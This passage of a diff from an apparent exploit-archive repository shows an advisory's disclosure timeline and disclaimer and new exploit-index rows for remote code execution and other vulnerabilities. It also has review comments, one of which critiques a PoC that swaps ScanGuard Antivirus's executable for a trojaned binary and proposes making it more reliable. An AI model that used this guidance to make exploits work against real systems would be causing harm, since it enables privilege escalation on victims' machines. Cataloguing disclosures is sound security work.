2019 +Received vendor acknowledgement: September 16, 2019 +Second contact follow up: September 29, 2019 +No more vendor replies. +November 12, 2019 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. 
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 6719156fb..7831d9062 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10770,6 +10770,7 @@ id,file,description,date,author,type,platform,port
 47642,exploits/windows/local/47642.txt,"RTK IIS Codec Service 6.4.10041.133 - 'RtkI2SCodec' Unquote Service Path",2019-11-12,chuyreds,local,windows,
 47645,exploits/windows/local/47645.py,"Control Center PRO 6.2.9 - Local Stack Based Buffer Overflow (SEH)",2019-11-12,sasaga92,local,windows,
 47647,exploits/windows/local/47647.txt,"Wondershare Application Framework Service - _WsAppService_ Unquote Service Path",2019-11-12,chuyreds,local,windows,
+47656,exploits/windows/local/47656.txt,"ScanGuard Antivirus 2020 - Insecure Folder Permissions",2019-11-13,hyp3rlinx,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
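Review bot: None of the filesystem calls in the PoC's `main()` are checked — `rename(TARGET, DISABLED_TARGET)`, `CopyFile(fname, newLoc, FALSE)` and both `MoveFile` calls return a status that is ignored — so if the running `ScanGuard.exe` is locked or the ACL has since been tightened the program still prints `Replaced legit ScanGuard...` and `Done!`; test each return value and print `GetLastError()` on failure. The cleanup path is inconsistent with the setup: the stub is moved to the absolute `"c:\\Program Files (x86)\\ScanGuard\\ScamGuard.lnk"`, but the second run tests `FileExists("ScamGuard.lnk")` and runs `DEL /f ScamGuard.lnk` relative to the current directory, so the file is removed only when the trojaned binary happens to be launched from that folder. Both `#include` lines have lost their header names (presumably `windows.h` and `stdio.h`) on export, and `void main(void)` should be `int main(void)`. The icacls output is for the `\bins` subfolder with inherited `(ID)` ACEs, which supports the claim that the installation root grants `Everyone` and `BUILTIN\Users` Full Control; showing the parent directory's ACL would make the root cause explicit.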
@@ -41964,3 +41965,9 @@ id,file,description,date,author,type,platform,port
 47643,exploits/aspx/webapps/47643.txt,"Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting",2019-11-12,Cy83rl0gger,webapps,aspx,
 47644,exploits/hardware/webapps/47644.py,"FlexAir Access Control 2.3.35 - Authentication Bypass",2019-11-12,LiquidWorm,webapps,hardware,
 47648,exploits/hardware/webapps/47648.txt,"Bematech Printer MP-4200 - Denial of Service",2019-11-12,"Jonatas Fil",webapps,hardware,
+47649,exploits/hardware/webapps/47649.py,"Linear eMerge E3 1.00-06 - Remote Code Execution",2019-11-13,LiquidWorm,webapps,hardware,
+47650,exploits/php/webapps/47650.txt,"FUDForum 3.0.9 - Remote Code Execution",2019-11-13,liquidsky,webapps,php,
+47651,exploits/hardware/webapps/47651.txt,"Technicolor TD5130.2 - Remote Command Execution",2019-11-13,"João Teles",webapps,hardware,
+47652,exploits/hardware/webapps/47652.py,"Technicolor TC7300.B0 - 'hostname' Persistent Cross-Site Scripting",2019-11-13,"Luis Santana",webapps,hardware,
+47653,exploits/php/webapps/47653.txt,"gSOAP 2.8 - Directory Traversal",2019-11-13,"numan türle",webapps,php,
+47654,exploits/hardware/webapps/47654.py,"Fastweb Fastgate 0.00.81 - Remote Code Execution",2019-11-13,"Riccardo Gasparini",webapps,hardware,
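Review bot: The author column for 47652 reads `"Luis Santana"` while the header of `exploits/hardware/webapps/47652.py` in this same commit gives `Luis Stefan` (and `__author__ = "Luis Stefan"`); one of the two is wrong and the index should match the file. 47653 is indexed as `"numan türle"` although the file's header says `Numan Türle`; the index normally keeps the author's own capitalization. The other new rows agree with their file headers.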